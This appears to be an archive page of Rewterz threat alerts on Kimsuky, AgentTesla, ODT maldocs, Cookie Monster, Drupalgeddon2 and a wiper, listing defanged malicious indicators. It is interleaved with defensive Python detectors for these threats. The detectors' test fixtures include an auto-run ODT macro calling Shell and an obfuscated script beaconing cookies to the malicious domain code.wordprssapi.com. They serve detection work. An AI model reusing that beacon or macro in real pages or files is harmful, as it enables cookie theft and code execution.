Archive for category Threats

Rewterz Threat Alert – Kimsuky Group – IOC’s

Severity

High

Analysis Summary

The Kimsuky group is a threat group known to have been behind the 2014 cyber attacks on KHNP (Korea Hydro & Nuclear Power) and still active as of 2019. The spear-phishing emails used in this campaign were designed to steal portal account credentials and carried malicious attachments. The main targets are government and military officials and reporters.

Impact

  • Credential theft
  • Financial loss

Indicators of Compromise

Malware Hashes:

MD5

  • f22db1e3ea74af791e34ad5aa0297664
  • 4de21c3af64b3b605446278de92dfff4
  • 53ac231e8091abcd0978124f9268b4e4
  • 8b59ea1ee28e0123da82801abc0cce4d

SHA256

  • 4f279a55f3658df8206b0b4ca231960a99b51ea3a8a1314a77c3a453ecf5ea2e
  • b40f367c6ec771a7798ec72abff730fb4bba032f18bcc137d572e4119a23f21c

URL

  • http[:]//sariwon[.]co[.]kr/bbs/filter/6EBDB1428052/private64
  • http[:]//sariwon[.]co[.]kr/bbs/filter/6EBDB1428052/secu64_init
  • http[:]//sariwon[.]co[.]kr/bbs/filter/E826DDE74E06/private64
  • http[:]//sariwon[.]co[.]kr/bbs/filter/E826DDE74E06/secu64_init
  • http[:]//www[.]sariwon[.]co[.]kr/bbs/security/scnu/HncCheck[.]zip

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.
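The indicator lists in this alert (and in the alerts further down the page) are only useful once they are refanged and matched against something. The following Python is an added example, not part of the Rewterz alert: it refangs the hashes and URLs listed above, matches URLs from a constructed proxy log both exactly and by the shared path pattern, and checks file content against the hash sets. The proxy log format, the client addresses, and the generalisation of the /bbs/filter/<12 hex>/ directory to any 12-hex-digit ID are assumptions of the example, not statements made in the alert.

```python
import hashlib
import re
from typing import List, Optional, Tuple

# Indicators copied from the alert above, still in defanged form.
KIMSUKY_MD5 = {
    "f22db1e3ea74af791e34ad5aa0297664",
    "4de21c3af64b3b605446278de92dfff4",
    "53ac231e8091abcd0978124f9268b4e4",
    "8b59ea1ee28e0123da82801abc0cce4d",
}
KIMSUKY_SHA256 = {
    "4f279a55f3658df8206b0b4ca231960a99b51ea3a8a1314a77c3a453ecf5ea2e",
    "b40f367c6ec771a7798ec72abff730fb4bba032f18bcc137d572e4119a23f21c",
}
KIMSUKY_URLS_DEFANGED = [
    "http[:]//sariwon[.]co[.]kr/bbs/filter/6EBDB1428052/private64",
    "http[:]//sariwon[.]co[.]kr/bbs/filter/6EBDB1428052/secu64_init",
    "http[:]//sariwon[.]co[.]kr/bbs/filter/E826DDE74E06/private64",
    "http[:]//sariwon[.]co[.]kr/bbs/filter/E826DDE74E06/secu64_init",
    "http[:]//www[.]sariwon[.]co[.]kr/bbs/security/scnu/HncCheck[.]zip",
]


def refang(ioc: str) -> str:
    """Undo the [.] / [:] / [@] / hxxp defanging used in threat alerts."""
    return (ioc.replace("[.]", ".").replace("[:]", ":")
               .replace("[@]", "@").replace("hxxp", "http"))


KIMSUKY_URLS = {refang(u) for u in KIMSUKY_URLS_DEFANGED}

# The four /bbs/filter/ URLs differ only in a 12-hex-digit directory, so a pattern
# also catches sibling paths the alert did not list. Treating that directory as a
# variable ID is this example's assumption, not something the alert states.
KIMSUKY_PATH_RE = re.compile(
    r"sariwon\.co\.kr/bbs/filter/[0-9A-Fa-f]{12}/(?:private64|secu64_init)(?:[/?#]|$)"
)


def match_url(url: str) -> Optional[str]:
    """Return 'exact', 'pattern', or None for a URL seen in proxy logs."""
    if url in KIMSUKY_URLS:
        return "exact"
    if KIMSUKY_PATH_RE.search(url):
        return "pattern"
    return None


def hash_matches(data: bytes) -> List[str]:
    """Which of the alert's hash sets the given file content belongs to."""
    hits = []
    if hashlib.md5(data).hexdigest() in KIMSUKY_MD5:
        hits.append("md5")
    if hashlib.sha256(data).hexdigest() in KIMSUKY_SHA256:
        hits.append("sha256")
    return hits


# Constructed proxy log sample: "<epoch> <client> <method> <url> <status>".
SAMPLE_PROXY_LOG = """\
1562000000.101 10.0.0.5 GET http://sariwon.co.kr/bbs/filter/6EBDB1428052/private64 200
1562000001.202 10.0.0.5 GET http://sariwon.co.kr/bbs/filter/A1B2C3D4E5F6/secu64_init 200
1562000002.303 10.0.0.9 GET http://www.example.com/news/today 200
1562000003.404 10.0.0.7 GET http://www.sariwon.co.kr/bbs/security/scnu/HncCheck.zip 200
"""


def scan_proxy_log(log: str) -> List[Tuple[str, str, str]]:
    """Return (client, url, kind) for every line whose URL matches an indicator."""
    hits = []
    for line in log.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[3]
        kind = match_url(url)
        if kind:
            hits.append((client, url, kind))
    return hits


if __name__ == "__main__":
    for client, url, kind in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{kind:7} {client} -> {url}")
```

The pattern match is deliberately reported separately from exact matches: an exact hit is a confirmed indicator, a pattern hit is a lead that needs the fetched content checked before it is treated as the same campaign.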

Rewterz Threat Alert – Another Agenttesla campaign using a compromised Iraq Government site

Severity

Medium

Analysis Summary

An AgentTesla campaign is observed delivering email attachments that pose as a purchase order; the attachment is an ISO file. Stolen data is exfiltrated over SMTP to a compromised mail server belonging to the Iraqi government (mail[.]cosqc[.]gov[.]iq). The attackers use SMTP submission port 587 with STARTTLS, so the exfiltration traffic, including the recipient addresses and the message contents, is encrypted in transit and cannot be inspected on the wire. The payload is an information stealer that harvests passwords, bank, PayPal and other financial details, and email and FTP (web hosting) login credentials.
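Because the exfiltration channel is SMTP submission with STARTTLS, a proxy or IDS sees only an encrypted session; what remains visible is which host opened a connection to port 587 and where to. The Python below is an added example, not code from the alert: it runs a metadata-only rule over constructed, simplified Zeek conn.log records, flagging connections that involve the alert's listed IPs and any endpoint that speaks SMTP to the Internet without going through the organisation's mail relay. The internal ranges, the relay address and the log lines are assumed values; matching the hostname mail[.]cosqc[.]gov[.]iq would additionally require DNS log correlation, which is not shown.

```python
from ipaddress import ip_address, ip_network
from typing import Dict, List

# IPs listed under "Source IP" in the alert above. The alert does not say on
# which side of a connection they were observed, so they are matched as either end.
AGENTTESLA_IOC_IPS = {
    ip_address(a) for a in ("108.167.161.64", "176.28.103.205", "192.185.10.45")
}

# Assumed environment (example values, not from the alert): internal ranges and
# the only hosts that are allowed to speak SMTP to the Internet.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
MAIL_RELAYS = {ip_address("10.20.1.5")}
SMTP_PORTS = {25, 465, 587}

# Constructed, simplified Zeek conn.log records, tab-separated:
# ts  id.orig_h  id.resp_h  id.resp_p  proto  service
SAMPLE_CONN_LOG = """\
1561990001.1\t10.20.30.41\t192.185.10.45\t587\ttcp\tsmtp
1561990002.2\t10.20.30.41\t40.97.0.10\t443\ttcp\tssl
1561990003.3\t10.20.30.12\t10.20.1.5\t587\ttcp\tsmtp
1561990004.4\t10.20.1.5\t108.167.161.64\t587\ttcp\tsmtp
1561990005.5\t10.20.30.77\t203.0.113.9\t587\ttcp\tsmtp
"""


def is_internal(ip) -> bool:
    return any(ip in net for net in INTERNAL_NETS)


def detect_smtp_exfil(conn_log: str) -> List[Dict[str, str]]:
    """Flag connections that look like stealer exfiltration over SMTP.

    STARTTLS hides addresses and contents, so the decision uses only
    connection metadata: known bad addresses first, then the policy rule
    "only mail relays may talk SMTP to the outside".
    """
    findings = []
    for line in conn_log.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, orig, resp, port, proto, _service = line.split("\t")
        orig_ip, resp_ip, port = ip_address(orig), ip_address(resp), int(port)
        if orig_ip in AGENTTESLA_IOC_IPS or resp_ip in AGENTTESLA_IOC_IPS:
            reason, severity = "ioc-ip", "high"
        elif (proto == "tcp" and port in SMTP_PORTS
              and is_internal(orig_ip) and orig_ip not in MAIL_RELAYS
              and not is_internal(resp_ip)):
            # The port rule fires even when Zeek could not identify the service,
            # which is exactly the case once the session is wrapped in TLS.
            reason, severity = "direct-smtp-from-endpoint", "medium"
        else:
            continue
        findings.append({"ts": ts, "orig": orig, "resp": resp, "port": str(port),
                         "reason": reason, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in detect_smtp_exfil(SAMPLE_CONN_LOG):
        print(f"{f['severity']:6} {f['reason']:26} {f['orig']} -> {f['resp']}:{f['port']}")
```

The medium-severity rule is the durable one: the listed IPs will rotate, but a workstation that opens its own SMTP session to an arbitrary external mail server is abnormal regardless of which campaign is behind it.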

Impact

  • Keylogging
  • Information Theft
  • Unauthorized Remote Access

Indicators of Compromise

Email Subject

FW: Purchase Order – PO. 4029530

From Email

payment[@]buddiesholidays[.]in

Hostname

mail[.]cosqc[.]gov[.]iq (compromised)

Malware Hashes

MD5

  • 948ab06c3ad8ff56fef7f5d50e647eeb
  • 91d6c671df51ea336208f8cf80ef6283

SHA256

  • 3b0b880e65ae7ef1c34e57e3e43d924f78fd6a68ddc694094b6ff0d1621dda1c
  • 8eebcb7d52c969e6bb4704f11022afdf9d61462f96ad27e6859863fa681c77e6

SHA1

  • a2e0db01e3d4b7a1543a09564039a6ca64c183e1
  • 2bfbf256c019413ead6ee3ea0a76200e378d7019

Source IP

  • 108[.]167[.]161[.]64
  • 176[.]28[.]103[.]205
  • 192[.]185[.]10[.]45

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download email attachments coming from untrusted sources.
  • Do not execute untrusted files.

Rewterz Threat Alert – Open Document format creates twist in maldoc landscape

Severity

Medium

Analysis Summary

Cisco Talos recently observed attackers changing the file formats they use in an attempt to evade common antivirus engines. This can happen with other file formats too, but the case described here concerns an actor who appears to consider antivirus engines "too good" at detecting macro-based infection vectors and has switched to the OpenDocument Text (ODT) format to bypass those detections. ODT is a ZIP archive containing XML-based files; it is an open format supported by Microsoft Office as well as by Apache OpenOffice and LibreOffice, so a document carrying macros or embedded objects in ODT form can reach users without triggering signatures written for Office macro documents.
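Since ODT is just a ZIP archive of XML files, detection logic can look at the document's structure rather than at byte signatures: does it ship Basic macro modules, auto-run event listeners, or embedded OLE objects? The Python below is an added example, not Talos's or Rewterz's code. It builds a minimal ODT in memory as a constructed fixture and then inspects it for those traits. The entry names it relies on (mimetype first, Basic/<library>/<module>.xml for StarBasic code, "Object N" entries for embedded objects, script:event-listener elements in content.xml) follow the ODF packaging conventions used by LibreOffice; the standard namespace prefixes and the list of suspicious Basic calls are assumptions of the example.

```python
import io
import re
import zipfile
from typing import Dict, List

ODF_MIME_PREFIX = b"application/vnd.oasis.opendocument"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"    # compound-file header of embedded OLE objects
LIBRARY_FILES = ("script-lc.xml", "script-lb.xml")  # Basic library indexes, not code
SUSPICIOUS_BASIC = re.compile(r"\b(Shell|CreateObject|Environ|FileCopy|Kill)\s*\(")
EVENT_LISTENER = re.compile(
    r'<script:event-listener[^>]*script:event-name="([^"]+)"[^>]*xlink:href="([^"]+)"')


def build_sample_odt(with_macro: bool = True, with_ole: bool = True) -> bytes:
    """Construct a minimal ODT in memory (a test fixture, not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        # ODF requires 'mimetype' to be the first entry and stored uncompressed.
        z.writestr(zipfile.ZipInfo("mimetype"),
                   "application/vnd.oasis.opendocument.text",
                   compress_type=zipfile.ZIP_STORED)
        manifest = ['<manifest:file-entry manifest:full-path="/" '
                    'manifest:media-type="application/vnd.oasis.opendocument.text"/>']
        content = ('<office:document-content><office:body><office:text>'
                   '<text:p>Purchase order</text:p>')
        if with_ole:
            content += '<draw:frame><draw:object-ole xlink:href="./Object 1"/></draw:frame>'
            z.writestr("Object 1", OLE2_MAGIC + b"\x00" * 56)
            manifest.append('<manifest:file-entry manifest:full-path="Object 1" '
                            'manifest:media-type="application/vnd.sun.star.oleobject"/>')
        if with_macro:
            content += ('<office:event-listeners><script:event-listener '
                        'script:event-name="dom:load" xlink:href="vnd.sun.star.script:'
                        'Standard.Module1.Main?language=Basic&amp;location=document"/>'
                        '</office:event-listeners>')
            z.writestr("Basic/Standard/Module1.xml",
                       '<script:module script:name="Module1">Sub Main\n'
                       '  Shell("cmd /c calc")\nEnd Sub</script:module>')
            z.writestr("Basic/Standard/script-lb.xml",
                       '<library:library library:name="Standard"/>')
            manifest.append('<manifest:file-entry manifest:full-path="Basic/Standard/Module1.xml" '
                            'manifest:media-type="text/xml"/>')
        content += '</office:text></office:body></office:document-content>'
        z.writestr("content.xml", content)
        z.writestr("META-INF/manifest.xml",
                   "<manifest:manifest>" + "".join(manifest) + "</manifest:manifest>")
    return buf.getvalue()


def inspect_odt(data: bytes) -> Dict[str, List[str]]:
    """Structural triage of an ODT: macros, embedded OLE objects, auto-run hooks."""
    out: Dict[str, List[str]] = {"macros": [], "suspicious_calls": [], "embedded_objects": [],
                                 "event_listeners": [], "oddities": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if not names or names[0] != "mimetype":
            out["oddities"].append("mimetype entry missing or not first")
        elif not z.read("mimetype").startswith(ODF_MIME_PREFIX):
            out["oddities"].append("unexpected mimetype")
        for name in names:
            if name.startswith("Basic/") and not name.endswith(LIBRARY_FILES):
                out["macros"].append(name)
                src = z.read(name).decode("utf-8", "replace")
                out["suspicious_calls"] += [f"{name}: {m}" for m in SUSPICIOUS_BASIC.findall(src)]
            elif name.startswith("Object ") or z.read(name)[:8] == OLE2_MAGIC:
                out["embedded_objects"].append(name)
        if "content.xml" in names:
            xml = z.read("content.xml").decode("utf-8", "replace")
            out["event_listeners"] += [f"{ev} -> {href}" for ev, href in EVENT_LISTENER.findall(xml)]
    return out


if __name__ == "__main__":
    for key, items in inspect_odt(build_sample_odt()).items():
        print(key, items)
```

A document with a dom:load listener pointing at a Basic module is the ODT equivalent of an AutoOpen macro; an "Object N" entry whose bytes start with the OLE2 magic is where an embedded exploit object would live. Both are cheap to check at the mail gateway without any signature for the payload itself.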

Impact

Exposure of sensitive information

Indicator of Compromise

Malware Hash SHA256

  • 02000ddf92ceb363760acc1d06b7cd1f05be7a1ca6df68586e77cf65f4c6963e
  • 19027327329e2314b506d9f44b6871f2613b8bb72aa831004e6be873bdb1175d
  • 20919e87d52b1609bc35d939695405212b8ca540e50ce8bece01a9fccfa70169
  • 2f4aa28974486152092669c85d75232098d32446adefeeef3a94ad4c58af0fc8
  • 429d270195bed378495349cf066aee649fd1c8c450530d896844b1692ddddc77
  • 80c62c646cce264c08deb02753f619da82b27d9c727e854904b9b7d88e45bf9e
  • 84cb192cc6416b20293dfb8c621267e1584815a188b67757fa0d1af29a7cfdcd
  • b2b51864fa2f80f8edbdaf6721a6780e15a30291a748c2dfc52d574de0d8c3ed
  • d099eac776eabf48f55a75eb863ad539a546202da02720aa83d88308be3ce4ca
  • de8e85328b1911084455e7dc78b18fd1c6f84366a23eaa273be7fbe4488613dd
  • efb81fb8095319f5ee6fd4d6741b80386a824b9df05460d16d22cad1d6bbb35d
  • f24c6a56273163595197c68abeab7f18e4e2bedd6213892d83cdb7a191ff9900
  • f5194cc197d98ed9078cceca223e294c5ec873b86cbeff92eb9eaca17fc90584
  • f9138756639104e2c392b085cc5a98b1db77f0ed6e3b79eacac9899001ed7116

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Rewterz Threat Alert – Cookie Monster Malware Hijacking WordPress Sessions

Severity

Medium

Analysis Summary

A malware attack is observed injecting obfuscated code into a JavaScript file in order to steal web users' cookies and hijack their WordPress sessions. The malicious script was discovered during an incident response investigation and contained the fake, malicious domain "code.wordprssapi[.]com", to which users' cookie data was sent. The attackers used a typo-squatting strategy, creating a domain that looks very similar to that of a real, legitimate web service in order to evade detection. Note, however, that the properly spelled version of this domain, "code.wordpressapi[.]com", is also unrelated to WordPress.
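Two things the investigation above turns on can be automated: recovering the real strings from an obfuscated script, and recognising a look-alike domain before it appears on any blocklist. The Python below is an added example, not code from the incident. It decodes hex-escaped string tables in a constructed snippet modelled on the described behaviour, checks whether the script reads document.cookie (directly, or through split literals as array-index obfuscation does), extracts beacon domains, and compares each second-level label against a brand list using edit distance, which also catches jguery/ijquery9-style names from the indicator list below. The brand list, the snippet and the naive second-level-label extraction (no public-suffix handling) are assumptions of the example.

```python
import re
from typing import Dict, Optional

# Brands worth protecting against look-alike domains; extend per environment (assumed list).
BRANDS = ("wordpress", "jquery", "google")

# Domains from this alert, refanged by hand: the exfil host named in the summary
# plus three look-alikes from the indicator list below.
COOKIE_MONSTER_DOMAINS = {"code.wordprssapi.com", "jquery.im", "ijquery9.com", "code.jguery.org"}

HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
UNI_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
STRING_LIT = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
DOMAIN_IN_URL = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def decode_js_strings(src: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes so obfuscated literals become readable."""
    src = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), src)
    return UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), src)


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute), row-by-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(label: str, brands=BRANDS) -> Optional[str]:
    """Flag a domain label that contains a brand name or is one edit away from one."""
    for brand in brands:
        if brand in label:
            return f"contains:{brand}"
        # Slide windows of roughly the brand's length so "wordprssapi" still
        # surfaces "wordprss" (one deletion away from "wordpress").
        for n in (len(brand) - 1, len(brand), len(brand) + 1):
            for i in range(len(label) - n + 1):
                if levenshtein(label[i:i + n], brand) == 1:
                    return f"lookalike:{brand}"
    return None


def scan_js(src: str) -> Dict[str, object]:
    decoded = decode_js_strings(src)
    literals = [m.group(2) for m in STRING_LIT.finditer(decoded)]
    # Array-indexed obfuscation splits document.cookie into two separate literals.
    cookie_access = ("document.cookie" in decoded
                     or {"document", "cookie"} <= set(literals))
    domains = sorted(set(DOMAIN_IN_URL.findall(decoded)))
    lookalikes = {d: lookalike(d.lower().split(".")[-2]) for d in domains}
    return {"cookie_access": cookie_access,
            "domains": domains,
            "lookalikes": {d: v for d, v in lookalikes.items() if v},
            "ioc_hits": [d for d in domains if d.lower() in COOKIE_MONSTER_DOMAINS],
            "verdict": cookie_access and bool(domains)}


def _hexify(s: str) -> str:
    return "".join(f"\\x{ord(c):02x}" for c in s)


# Constructed snippet in the style described above: hex-escaped string table,
# cookie read through bracket access, beacon sent via an Image object.
SAMPLE_JS = (
    'var _0x1=["' + _hexify("document") + '","' + _hexify("cookie") + '","'
    + _hexify("https://code.wordprssapi.com/c.php?d=") + '"];\n'
    '(new Image)["src"]=_0x1[2]+encodeURIComponent(window[_0x1[0]][_0x1[1]]);\n'
)

if __name__ == "__main__":
    print(scan_js(SAMPLE_JS))
```

The look-alike check is the part that generalises: the exact domain in this incident was not on a blocklist at the time, but "one edit away from wordpress" and "one edit away from jquery" both describe entries in the indicator list below, so the same rule would have caught them too.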

Impact

  • Information Theft
  • Code Execution

Indicators of Compromise

Domain Name

  • abtrcking[.]com
  • upgraderservices[.]cf
  • traffictrade[.]life
  • flipdigital[.]ru
  • stablemoney[.]ru
  • cleantds[.]in
  • dezaula[.]com
  • bwinpoker24[.]com
  • livestats[.]us
  • mediros[.]ru
  • yourmsrp[.]com
  • onlinemarketplace[.]top
  • pipardot[.]com
  • beatchucknorris[.]com
  • adrenalinecdn[.]com
  • blozoo[.]net
  • oasagm82wioi[.]org
  • hosted-oswa[.]org
  • getsocialbuttons[.]xyz
  • trafficapi[.]nl
  • zirve100[.]com
  • nstracking[.]com
  • dcts[.]pw
  • airjss[.]com
  • sbdtds[.]com
  • jquery[.]im
  • ijquery9[.]com
  • upskirt-jp[.]net

Hostname

  • con1[.]sometimesfree[.]biz
  • www[.]caphyon-analytics[.]com
  • src[.]dancewithme[.]biz
  • 1[.]newor[.]net
  • gamescale[.]vio[.]rocks
  • a01[.]u-ad[.]info
  • log[.]widgetstat[.]net
  • 3[.]newor[.]net
  • i[.]omeljs[.]info
  • js2[.]sn00[.]net
  • themes[.]affect[.]lt
  • b[.]nwcdn[.]xyz
  • i[.]rfgdjs[.]info
  • www[.]rarstats[.]com
  • cdn[.]avrti[.]xyz
  • chat-client-js[.]firehoseapp[.]com
  • m[.]free-codes[.]org
  • tag[.]imaginaxs[.]com
  • cdn[.]muse-widgets[.]ru
  • i[.]selectionlinksjs[.]info
  • cdn[.]echoenabled[.]com
  • sdb[.]dancewithme[.]biz
  • earsham[.]pontypriddcrick[.]com
  • c[.]radxcomm[.]com
  • java[.]sometimesfree[.]biz
  • api[.]behavioralmailing[.]com
  • www[.]kanpianjs[.]top
  • cdn[.]jquery[.]tools
  • www[.]seo101[.]net
  • www[.]andrewandjack[.]com
  • webstats[.]xcellenzy[.]com
  • st[.]stadsvc[.]com
  • infinite-2[.]tcs3[.]co[.]uk
  • www[.]yys1982[.]com
  • i3[.]putags[.]com
  • stat[.]botthumb[.]com
  • js[.]sn00[.]net
  • st[.]segpress[.]io
  • m[.]xfanclub[.]ru
  • daljarrock[.]hurlinesswhitchurch[.]com
  • cdn[.]owlcdn[.]com
  • da[.]adsvcs[.]com
  • cfs[.]u-ad[.]info
  • srv1[.]clk-analytics[.]com
  • infinite-3[.]tcs3[.]co[.]uk
  • dup[.]baidustatic[.]pw
  • www[.]spartan-ntv[.]com
  • static[.]bh-cdn[.]com
  • d0[.]histats[.]12mlbe[.]com
  • www[.]ournet-analytics[.]com
  • s1[.]omnitor[.]ru
  • connect[.]f1call[.]com
  • www[.]frompariswithhate[.]org
  • 2[.]api[.]viralheadlines[.]net
  • www[.]agrkings[.]com
  • keit[.]kristofer[.]ga
  • parts[.]kuru2jam[.]com
  • code[.]jguery[.]org
  • widgets[.]wowzio[.]net
  • js[.]nster[.]net
  • script[.]affilizr[.]com
  • cdn[.]inaudium[.]com
  • e[.]e708[.]net
  • narnia[.]tcs3[.]co[.]uk
  • js[.]trafficanalytics[.]online
  • www[.]takoashi[.]net
  • w5983[.]lb[.]wa-track[.]com
  • cdn[.]adpoints[.]media
  • stat[.]rolledwil[.]biz
  • s[.]orange81safe[.]com
  • www[.]hmailserver[.]in

Remediation

  • Block the threat indicators at their respective controls.
  • Do not visit suspicious looking sites.

Rewterz Threat Alert – Attack Campaign Using Drupalgeddon2

Severity

Medium

Analysis Summary

An attack campaign is using the Drupalgeddon2 unauthenticated remote code execution vulnerability in Drupal to run malicious code and deface websites. In the case analyzed in their blog, Akamai researchers identified a compromised bodysurfing website whose logs contained requests carrying code execution attempts. The injected code first cleans up earlier infections and weakens the web server's security posture, then downloads two files: a GIF image and a TXT file. The GIF has a valid GIF header but is actually used to execute embedded PHP code. That PHP code defaces the site and shows visitors a notice of the infection; hidden behind the defacement page are functions that let the attacker run commands via GET or POST requests, including scanning for local credentials, collecting system configuration, and opening a web shell. The TXT file contains a malicious Perl script that gives the attacker denial of service (DoS) and RAT capabilities; for command and control it uses an IRC server that has since been taken down. The researchers note that the attack appears opportunistic rather than targeted.

Impact

  • Denial of service
  • Credential theft
  • Exposure of sensitive information

Indicator of Compromise

IP

91[.]121[.]160[.]194

SHA256

e18bf4ddee0b0db77541f3a3ea52d3bbe8fa943dd0ca3f573572fea22533afbe

SHA1

0ef7f63d746c34819d21057bd58b02781777bb29

Remediation

  • Block all threat indicators at your respective controls.
  • Patch Drupal core against Drupalgeddon2 (CVE-2018-7600); sites that remained unpatched after the fix was released should be treated as potentially compromised and checked for the defacement page, web shells and the downloaded GIF and TXT files.

Rewterz Threat Alert – “Lost Files” Data Wiper Ransomware Getting Paid Without Recovering Files

Severity

High

Analysis Summary

A malicious file masquerading as Windows Security Scanner is being distributed via spam and demands a ransom despite corrupting files and making them unrecoverable. The file is delivered by a link in an email claiming that a virus has been detected on the victim's computer and that they need to run a security scanner. The link leads to the download of a ZIP archive containing the main payload and several additional executables in a hidden folder. The malware attempts to distract the victim with a fake installation progress bar. In the background, files in the Users folder are targeted by the supposed ransomware. However, instead of implementing an encryption algorithm like most ransomware, this malware removes the first line of each targeted file. The method the author used to do this ends up corrupting any binary file. Because of this, the malware acts more like a wiper than ransomware, and paying the requested ransom will not produce a decryption key capable of recovering the files.
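Why paying cannot work here follows from what the malware actually does: it discards bytes rather than transforming them. The Python below is an added example, not the malware and not Rewterz's code. It models the described damage on constructed in-memory samples (everything up to and including the first 0x0A byte is removed; the alert does not give the author's exact implementation, so that is the example's assumption) and then triages the result the way an incident responder would: a file whose lost prefix was nothing but its format's constant signature (a PNG, whose signature contains a newline) can have that prefix re-attached, while a file that lost file-specific bytes cannot be restored from anything but a backup.

```python
import os
from typing import Dict, Tuple

# Fixed leading signatures by extension (well-known magic numbers).
MAGIC_BY_EXT = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
    ".zip": b"PK\x03\x04",
    ".docx": b"PK\x03\x04",
}

# Constructed sample files: only headers plus a little filler.
SAMPLE_FILES: Dict[str, bytes] = {
    "photo.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 13 + b"\x1f\x15\xc4\x89",
    "scan.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\x12\n\x34\xff\xd9",
    "notes.txt": b"first line of notes\nsecond line\n",
}


def drop_first_line(data: bytes) -> bytes:
    """Model of the damage described in the alert (assumed: a 'line' ends at 0x0A).

    Binary files have no meaningful first line, so whatever precedes the first
    0x0A byte, usually part of the header, is simply gone. Operates in memory only.
    """
    nl = data.find(b"\n")
    return data if nl < 0 else data[nl + 1:]


def triage(name: str, damaged: bytes) -> Tuple[str, bytes]:
    """Classify a damaged file and return (status, best-effort content).

    'repairable' means the only missing bytes were the format's constant
    signature prefix, which can be re-attached verbatim. Anything else lost
    file-specific data, and no key exists that could bring it back.
    """
    magic = MAGIC_BY_EXT.get(os.path.splitext(name)[1].lower())
    if magic is None:
        return "unknown-type", damaged
    if damaged.startswith(magic):
        return "intact", damaged
    nl = magic.find(b"\n")
    if nl >= 0 and damaged.startswith(magic[nl + 1:]):
        return "repairable", magic[:nl + 1] + damaged
    return "unrecoverable", damaged


def assess_all(files: Dict[str, bytes]) -> Dict[str, str]:
    """Apply the modelled damage to each sample and report the triage status."""
    return {name: triage(name, drop_first_line(data))[0] for name, data in files.items()}


if __name__ == "__main__":
    for name, status in assess_all(SAMPLE_FILES).items():
        print(f"{name:10} {status}")
```

The JPEG case is the common one: the first 0x0A byte sits somewhere inside image data, so everything before it, including the SOI marker and the JFIF segment, is destroyed and nothing about the remaining bytes tells you what was there. That is the practical meaning of "wiper" in the summary above, and the reason the first remediation step is restoring from backup, not negotiating.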

Impact

File corruption and permanent data loss (files are damaged, not encrypted, so no decryption is possible)

Indicators of Compromise

MD5

b594412c00331c12d15d9e18c02a778a

SHA256

02629729329cde8d1892afa1d412a75cfcc338826c0b5087a2ef3182b5a1af85

SHA1

697301b4aee6fd89bb655025d772b68ddc2756be

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Copyright © Rewterz. All rights reserved.